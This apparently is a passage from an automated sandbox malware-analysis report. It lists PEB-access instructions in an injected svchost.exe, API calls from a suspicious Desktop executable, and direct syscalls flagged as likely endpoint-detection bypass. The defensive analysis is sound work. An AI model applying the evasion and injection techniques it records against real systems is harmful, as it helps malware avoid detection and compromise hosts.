                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C304E5 mov ecx, dword ptr fs:[00000030h]1_2_03C304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA49A mov eax, dword ptr fs:[00000030h]1_2_03CEA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C364AB mov eax, dword ptr fs:[00000030h]1_2_03C364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C644B0 mov ecx, dword ptr fs:[00000030h]1_2_03C644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBA4B0 mov eax, dword ptr fs:[00000030h]1_2_03CBA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA456 mov eax, dword ptr fs:[00000030h]1_2_03CEA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2645D mov eax, dword ptr fs:[00000030h]1_2_03C2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5245A mov eax, dword ptr fs:[00000030h]1_2_03C5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC460 mov ecx, dword ptr fs:[00000030h]1_2_03CBC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]1_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]1_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]1_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]1_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]1_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]1_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E420 mov eax, dword ptr fs:[00000030h]1_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E420 mov eax, dword ptr fs:[00000030h]1_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E420 mov eax, dword ptr fs:[00000030h]1_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C427 mov eax, dword ptr fs:[00000030h]1_2_03C2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50BCB mov eax, dword ptr fs:[00000030h]1_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50BCB mov eax, dword ptr fs:[00000030h]1_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50BCB mov eax, dword ptr fs:[00000030h]1_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30BCD mov eax, dword ptr fs:[00000030h]1_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30BCD mov eax, dword ptr fs:[00000030h]1_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30BCD mov eax, dword ptr fs:[00000030h]1_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDEBD0 mov eax, dword ptr fs:[00000030h]1_2_03CDEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38BF0 mov eax, dword ptr fs:[00000030h]1_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38BF0 mov eax, dword ptr fs:[00000030h]1_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38BF0 mov eax, dword ptr fs:[00000030h]1_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5EBFC mov eax, dword ptr fs:[00000030h]1_2_03C5EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBCBF0 mov eax, dword ptr fs:[00000030h]1_2_03CBCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40BBE mov eax, dword ptr fs:[00000030h]1_2_03C40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40BBE mov eax, dword ptr fs:[00000030h]1_2_03C40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]1_2_03CE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]1_2_03CE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE4B4B mov eax, dword ptr fs:[00000030h]1_2_03CE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE4B4B mov eax, dword ptr fs:[00000030h]1_2_03CE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D02B57 mov eax, dword ptr fs:[00000030h]1_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D02B57 mov eax, dword ptr fs:[00000030h]1_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D02B57 mov eax, dword ptr fs:[00000030h]1_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D02B57 mov eax, dword ptr fs:[00000030h]1_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6B40 mov eax, dword ptr fs:[00000030h]1_2_03CC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6B40 mov eax, dword ptr fs:[00000030h]1_2_03CC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFAB40 mov eax, dword ptr fs:[00000030h]1_2_03CFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD8B42 mov eax, dword ptr fs:[00000030h]1_2_03CD8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28B50 mov eax, dword ptr fs:[00000030h]1_2_03C28B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDEB50 mov eax, dword ptr fs:[00000030h]1_2_03CDEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2CB7E mov eax, dword ptr fs:[00000030h]1_2_03C2CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04B00 mov eax, dword ptr fs:[00000030h]1_2_03D04B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5EB20 mov eax, dword ptr fs:[00000030h]1_2_03C5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5EB20 mov eax, dword ptr fs:[00000030h]1_2_03C5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF8B28 mov eax, dword ptr fs:[00000030h]1_2_03CF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF8B28 mov eax, dword ptr fs:[00000030h]1_2_03CF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C86ACC mov eax, dword ptr fs:[00000030h]1_2_03C86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C86ACC mov eax, dword ptr fs:[00000030h]1_2_03C86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C86ACC mov eax, dword ptr fs:[00000030h]1_2_03C86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30AD0 mov eax, dword ptr fs:[00000030h]1_2_03C30AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C64AD0 mov eax, dword ptr fs:[00000030h]1_2_03C64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C64AD0 mov eax, dword ptr fs:[00000030h]1_2_03C64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6AAEE mov eax, dword ptr fs:[00000030h]1_2_03C6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6AAEE mov eax, dword ptr fs:[00000030h]1_2_03C6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04A80 mov eax, dword ptr fs:[00000030h]1_2_03D04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68A90 mov edx, dword ptr fs:[00000030h]1_2_03C68A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38AA0 mov eax, dword ptr fs:[00000030h]1_2_03C38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38AA0 mov eax, dword ptr fs:[00000030h]1_2_03C38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C86AA4 mov eax, dword ptr fs:[00000030h]1_2_03C86AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40A5B mov eax, dword ptr fs:[00000030h]1_2_03C40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40A5B mov eax, dword ptr fs:[00000030h]1_2_03C40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6CA6F mov eax, dword ptr fs:[00000030h]1_2_03C6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6CA6F mov eax, dword ptr fs:[00000030h]1_2_03C6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6CA6F mov eax, dword ptr fs:[00000030h]1_2_03C6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDEA60 mov eax, dword ptr fs:[00000030h]1_2_03CDEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CACA72 mov eax, dword ptr fs:[00000030h]1_2_03CACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CACA72 mov eax, dword ptr fs:[00000030h]1_2_03CACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBCA11 mov eax, dword ptr fs:[00000030h]1_2_03CBCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6CA24 mov eax, dword ptr fs:[00000030h]1_2_03C6CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5EA2E mov eax, dword ptr fs:[00000030h]1_2_03C5EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C54A35 mov eax, dword ptr fs:[00000030h]1_2_03C54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C54A35 mov eax, dword ptr fs:[00000030h]1_2_03C54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC69C0 mov eax, dword ptr fs:[00000030h]1_2_03CC69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C649D0 mov eax, dword ptr fs:[00000030h]1_2_03C649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA9D3 mov eax, dword ptr fs:[00000030h]1_2_03CFA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE9E0 mov eax, dword ptr fs:[00000030h]1_2_03CBE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C629F9 mov eax, dword ptr fs:[00000030h]1_2_03C629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C629F9 mov eax, dword ptr fs:[00000030h]1_2_03C629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C309AD mov eax, dword ptr fs:[00000030h]1_2_03C309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C309AD mov eax, dword ptr fs:[00000030h]1_2_03C309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB89B3 mov esi, dword ptr fs:[00000030h]1_2_03CB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB89B3 mov eax, dword ptr fs:[00000030h]1_2_03CB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB89B3 mov eax, dword ptr fs:[00000030h]1_2_03CB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0946 mov eax, dword ptr fs:[00000030h]1_2_03CB0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04940 mov eax, dword ptr fs:[00000030h]1_2_03D04940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h]1_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h]1_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h]1_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E mov eax, dword ptr fs:[00000030h]1_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E mov edx, dword ptr fs:[00000030h]1_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E mov eax, dword ptr fs:[00000030h]1_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4978 mov eax, dword ptr fs:[00000030h]1_2_03CD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4978 mov eax, dword ptr fs:[00000030h]1_2_03CD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC97C mov eax, dword ptr fs:[00000030h]1_2_03CBC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE908 mov eax, dword ptr fs:[00000030h]1_2_03CAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE908 mov eax, dword ptr fs:[00000030h]1_2_03CAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC912 mov eax, dword ptr fs:[00000030h]1_2_03CBC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28918 mov eax, dword ptr fs:[00000030h]1_2_03C28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28918 mov eax, dword ptr fs:[00000030h]1_2_03C28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB892A mov eax, dword ptr fs:[00000030h]1_2_03CB892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC892B mov eax, dword ptr fs:[00000030h]1_2_03CC892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E8C0 mov eax, dword ptr fs:[00000030h]1_2_03C5E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D008C0 mov eax, dword ptr fs:[00000030h]1_2_03D008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA8E4 mov eax, dword ptr fs:[00000030h]1_2_03CFA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]1_2_03C6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]1_2_03C6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30887 mov eax, dword ptr fs:[00000030h]1_2_03C30887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC89D mov eax, dword ptr fs:[00000030h]1_2_03CBC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C42840 mov ecx, dword ptr fs:[00000030h]1_2_03C42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60854 mov eax, dword ptr fs:[00000030h]1_2_03C60854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34859 mov eax, dword ptr fs:[00000030h]1_2_03C34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34859 mov eax, dword ptr fs:[00000030h]1_2_03C34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE872 mov eax, dword ptr fs:[00000030h]1_2_03CBE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE872 mov eax, dword ptr fs:[00000030h]1_2_03CBE872
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_008180A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_008180A9
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007EA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007EA155
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007EA124 SetUnhandledExceptionFilter,0_2_007EA124

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
